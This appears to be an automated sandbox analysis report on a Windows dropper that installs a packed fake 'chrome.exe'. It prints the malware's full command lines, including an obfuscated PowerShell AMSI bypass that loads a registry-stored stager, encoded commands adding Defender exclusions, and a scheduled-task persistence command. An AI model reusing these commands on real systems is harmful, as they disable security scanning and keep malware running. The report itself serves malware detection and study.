Source: 33.0.chrome.exe.fa0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\34432.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, type: DROPPEDMatched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Windows\System32\nslookup.exeFile created: C:\Windows\Tasks\nslooksvc32.job
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001420 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001430 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,GetModuleHandleA,GetProcAddress,NtCreateThreadEx,CloseHandle,FindCloseChangeNotification,CloseHandle,
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD03120 NtEnumerateValueKey,NtEnumerateValueKey,
Source: chrome.exe.4.drStatic PE information: No import functions for PE file found
Source: 34432.exe.1.drStatic PE information: No import functions for PE file found
Source: Install.exe, 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename34432.exe< vs Install.exe
Source: Install.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeJump to behavior
Source: classification engineClassification label: mal100.troj.evad.winEXE@44/26@1/1
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\desktop.iniJump to behavior
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140001000 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,RegOpenKeyExW,RegSetValueExW,
Source: Install.exeVirustotal: Detection: 41%
Source: Install.exeReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\Install.exeFile read: C:\Users\user\Desktop\Install.exeJump to behavior
Source: C:\Users\user\Desktop\Install.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\Install.exe "C:\Users\user\Desktop\Install.exe"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe
Source: C:\Users\user\Desktop\Install.exeProcess created: C:\Users\user\AppData\Roaming\34432.exe C:\Users\user\AppData\Roaming\34432.exe
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
Source: C:\Users\user\Desktop\Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001000 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindCloseChangeNotification,FindResourceA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,CreateThread,Sleep,SleepEx,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000E010 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\34432.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Install.exeFile created: C:\Users\user\AppData\Local\Temp\nsaDAE.tmp
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_004021AA CoCreateInstance,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
Source: C:\Users\user\AppData\Roaming\34432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
